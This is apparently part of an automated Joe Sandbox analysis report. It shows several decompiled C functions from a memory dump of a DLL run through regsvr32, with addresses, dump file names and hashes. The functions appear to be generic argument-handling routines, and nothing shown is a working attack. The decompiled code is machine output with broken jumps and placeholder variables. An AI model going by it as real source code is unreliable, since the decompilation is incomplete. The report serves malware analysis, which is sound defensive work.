                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80022eab;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180022e08
                                                                      0x180022e19
                                                                      0x180022e1c
                                                                      0x180022e1e
                                                                      0x180022e23
                                                                      0x180022e2b
                                                                      0x180022e2e
                                                                      0x180022e3d
                                                                      0x180022e3f
                                                                      0x180022e45
                                                                      0x180022e48
                                                                      0x180022e4d
                                                                      0x180022e51
                                                                      0x180022e58
                                                                      0x180022e5e
                                                                      0x180022e63
                                                                      0x180022e68
                                                                      0x180022e6f
                                                                      0x180022e7f
                                                                      0x180022e81
                                                                      0x180022e8b
                                                                      0x180022e90
                                                                      0x180022e98
                                                                      0x180022e9a
                                                                      0x180022ea0
                                                                      0x180022ea5
                                                                      0x180022ea8
                                                                      0x180022eae
                                                                      0x180022eb0
                                                                      0x180022eb4
                                                                      0x180022eba
                                                                      0x180022ec4
                                                                      0x180022ec6
                                                                      0x180022eca
                                                                      0x180022ecd
                                                                      0x180022ed4
                                                                      0x180022ed8
                                                                      0x180022edf
                                                                      0x180022ee3
                                                                      0x180022ee8
                                                                      0x180022eed
                                                                      0x180022ef2
                                                                      0x180022eff
                                                                      0x180022f0e

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bcd9a4d74501d778bc06eb8b75c68725fd94772939e98c189726f0a3ca85962c
                                                                      • Instruction ID: 6baacc4045db198c149011e0b473770b05b1576f9eb3859ed59912b95ac254bb
                                                                      • Opcode Fuzzy Hash: bcd9a4d74501d778bc06eb8b75c68725fd94772939e98c189726f0a3ca85962c
                                                                      • Instruction Fuzzy Hash: A2319172214A88C6EBA68F29D1403AD77A0F39DB88F258125EB9D0B751CF36C556D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001EE60(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t79;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001ee8d;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x0000ffff;
                                                                      				 *__rdx = r8w;
                                                                      				goto 0x8001ef5a;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001eece;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t59, __rcx, _t68, __rdx, _t74, _t75, _t79);
                                                                      				goto 0x8001ef5c;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001ef4c;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001ef08;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x8001ef5c;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E0000000118000E818(_t43, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001ef00;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t63, _t65, _t69, _t72, _t74, _t75, _t79);
                                                                      				goto 0x8001ef03;
                                                                      				 *_t72 =  *( *(_t69 + 0x488 + _t63 * 8)) & 0x0000ffff;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001ee60
                                                                      0x18001ee71
                                                                      0x18001ee74
                                                                      0x18001ee76
                                                                      0x18001ee7b
                                                                      0x18001ee7f
                                                                      0x18001ee84
                                                                      0x18001ee88
                                                                      0x18001ee97
                                                                      0x18001ee99
                                                                      0x18001ee9f
                                                                      0x18001eea2
                                                                      0x18001eea7
                                                                      0x18001eeab
                                                                      0x18001eeb2
                                                                      0x18001eeb8
                                                                      0x18001eebd
                                                                      0x18001eec2
                                                                      0x18001eec9
                                                                      0x18001eed9
                                                                      0x18001eedb
                                                                      0x18001eee5
                                                                      0x18001eee9
                                                                      0x18001eef1
                                                                      0x18001eef3
                                                                      0x18001eef9
                                                                      0x18001eefd
                                                                      0x18001ef00
                                                                      0x18001ef06
                                                                      0x18001ef08
                                                                      0x18001ef0c
                                                                      0x18001ef12
                                                                      0x18001ef1c
                                                                      0x18001ef1e
                                                                      0x18001ef22
                                                                      0x18001ef25
                                                                      0x18001ef2c
                                                                      0x18001ef30
                                                                      0x18001ef37
                                                                      0x18001ef3b
                                                                      0x18001ef40
                                                                      0x18001ef45
                                                                      0x18001ef4a
                                                                      0x18001ef57
                                                                      0x18001ef66

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5042acee9224f427379fb223bfa459917aef110aabf833f927082b4b144ee45f
                                                                      • Instruction ID: 08bc52ee12c9493ce03449305db0c7153b6f8270ece026248df116a9deb4f7f5
                                                                      • Opcode Fuzzy Hash: 5042acee9224f427379fb223bfa459917aef110aabf833f927082b4b144ee45f
                                                                      • Instruction Fuzzy Hash: DF31A272214B8486EB658F29D0403AD7BA0F79EB8CF24812AEF4D4B751CF36C596DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180024E64(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed long long _v24;
                                                                      				signed long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed long long* _t71;
                                                                      				signed long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80024e8f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8);
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80024f5d;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80024ed0;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x80024f5f;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80024f50;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80024f0c;
                                                                      				 *_t71 = 1;
                                                                      				_t71[0] = r9w;
                                                                      				_t71[2] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80024f5f;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180010A8C(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x80024f04;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x80024f07;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x180024e64
                                                                      0x180024e64
                                                                      0x180024e75
                                                                      0x180024e78
                                                                      0x180024e7a
                                                                      0x180024e7f
                                                                      0x180024e83
                                                                      0x180024e87
                                                                      0x180024e8a
                                                                      0x180024e99
                                                                      0x180024e9b
                                                                      0x180024ea1
                                                                      0x180024ea4
                                                                      0x180024ea9
                                                                      0x180024ead
                                                                      0x180024eb4
                                                                      0x180024eba
                                                                      0x180024ebf
                                                                      0x180024ec4
                                                                      0x180024ecb
                                                                      0x180024edb
                                                                      0x180024edd
                                                                      0x180024ee7
                                                                      0x180024eec
                                                                      0x180024ef4
                                                                      0x180024ef6
                                                                      0x180024efc
                                                                      0x180024f01
                                                                      0x180024f04
                                                                      0x180024f0a
                                                                      0x180024f0c
                                                                      0x180024f10
                                                                      0x180024f20
                                                                      0x180024f22
                                                                      0x180024f26
                                                                      0x180024f29
                                                                      0x180024f30
                                                                      0x180024f34
                                                                      0x180024f3b
                                                                      0x180024f3f
                                                                      0x180024f44
                                                                      0x180024f49
                                                                      0x180024f4e
                                                                      0x180024f5a
                                                                      0x180024f69

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: adaf4ebae6ca829ad4b22997cbe19f7bb1fd488f99f3643dc50d7427465b59d6
                                                                      • Instruction ID: 3eab588b1fe1be8754b4cf9d22c86581c225ef3b945c64613fe3f25cfed3d285
                                                                      • Opcode Fuzzy Hash: adaf4ebae6ca829ad4b22997cbe19f7bb1fd488f99f3643dc50d7427465b59d6
                                                                      • Instruction Fuzzy Hash: 9331A273204A48C6EBA28F29E1403AD77A0F38DB8CF658125EB5D4B755CF36C596CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001AE78(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001aea3;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x8001af70;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001aee4;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001af72;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001af62;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001af1e;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001af72;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E00000001180015A5C(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001af16;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001af19;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x18001ae78
                                                                      0x18001ae89
                                                                      0x18001ae8c
                                                                      0x18001ae8e
                                                                      0x18001ae93
                                                                      0x18001ae9b
                                                                      0x18001ae9e
                                                                      0x18001aead
                                                                      0x18001aeaf
                                                                      0x18001aeb5
                                                                      0x18001aeb8
                                                                      0x18001aebd
                                                                      0x18001aec1
                                                                      0x18001aec8
                                                                      0x18001aece
                                                                      0x18001aed3
                                                                      0x18001aed8
                                                                      0x18001aedf
                                                                      0x18001aeef
                                                                      0x18001aef1
                                                                      0x18001aefb
                                                                      0x18001aeff
                                                                      0x18001af07
                                                                      0x18001af09
                                                                      0x18001af0f
                                                                      0x18001af13
                                                                      0x18001af16
                                                                      0x18001af1c
                                                                      0x18001af1e
                                                                      0x18001af22
                                                                      0x18001af28
                                                                      0x18001af32
                                                                      0x18001af34
                                                                      0x18001af38
                                                                      0x18001af3b
                                                                      0x18001af42
                                                                      0x18001af46
                                                                      0x18001af4d
                                                                      0x18001af51
                                                                      0x18001af56
                                                                      0x18001af5b
                                                                      0x18001af60
                                                                      0x18001af6d
                                                                      0x18001af7c

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction ID: 58aee26683ee7e69d815457ca91957e36cc7527516a95dc1dde3d44ec9d82862
                                                                      • Opcode Fuzzy Hash: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction Fuzzy Hash: F23193B2208B84C5EB618F69D0403AD77A0F38EB8CF558129EB8C4B355CF36C556C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180022F10(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80022f3b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x8002300a;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80022f7c;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8002300c;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80022ffc;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80022fb8;
                                                                      				 *_t71 = 2;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x8002300c;
                                                                      				_v24 = _t43;
                                                                      				r8d = 2;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180017AF4(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80022fb0;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80022fb3;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180022f10
                                                                      0x180022f21
                                                                      0x180022f24
                                                                      0x180022f26
                                                                      0x180022f2b
                                                                      0x180022f33
                                                                      0x180022f36
                                                                      0x180022f45
                                                                      0x180022f47
                                                                      0x180022f4d
                                                                      0x180022f50
                                                                      0x180022f55
                                                                      0x180022f59
                                                                      0x180022f60
                                                                      0x180022f66
                                                                      0x180022f6b
                                                                      0x180022f70
                                                                      0x180022f77
                                                                      0x180022f87
                                                                      0x180022f89
                                                                      0x180022f93
                                                                      0x180022f98
                                                                      0x180022fa0
                                                                      0x180022fa2
                                                                      0x180022fa8
                                                                      0x180022fad
                                                                      0x180022fb0
                                                                      0x180022fb6
                                                                      0x180022fb8
                                                                      0x180022fbc
                                                                      0x180022fc2
                                                                      0x180022fcc
                                                                      0x180022fce
                                                                      0x180022fd2
                                                                      0x180022fd5
                                                                      0x180022fdc
                                                                      0x180022fe0
                                                                      0x180022fe7
                                                                      0x180022feb
                                                                      0x180022ff0
                                                                      0x180022ff5
                                                                      0x180022ffa
                                                                      0x180023007
                                                                      0x180023016

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bcd9a4d74501d778bc06eb8b75c68725fd94772939e98c189726f0a3ca85962c
                                                                      • Instruction ID: d6319aa6bd8d927ebf7898e6fd931b9669201f7f585bbcdbe0d395b820fdb31a
                                                                      • Opcode Fuzzy Hash: bcd9a4d74501d778bc06eb8b75c68725fd94772939e98c189726f0a3ca85962c
                                                                      • Instruction Fuzzy Hash: B131A272204A48C6EBA68F29D1413AD77B0F38DB8CF648125EB8C0B751CF36C556CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001EF68(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				long long _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				char* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t79;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001ef93;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8b =  *((intOrPtr*)(_t68 - 8));
                                                                      				 *__rdx = r8b;
                                                                      				goto 0x8001f05e;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001efd4;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t59, __rcx, _t68, __rdx, _t74, _t75, _t79);
                                                                      				goto 0x8001f060;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001f052;
                                                                      				_t45 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001f00e;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x8001f060;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E0000000118000E818(_t43, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001f006;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t63, _t65, _t69, _t72, _t74, _t75, _t79);
                                                                      				goto 0x8001f009;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t63 * 8))));
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001ef68
                                                                      0x18001ef79
                                                                      0x18001ef7c
                                                                      0x18001ef7e
                                                                      0x18001ef83
                                                                      0x18001ef87
                                                                      0x18001ef8b
                                                                      0x18001ef8e
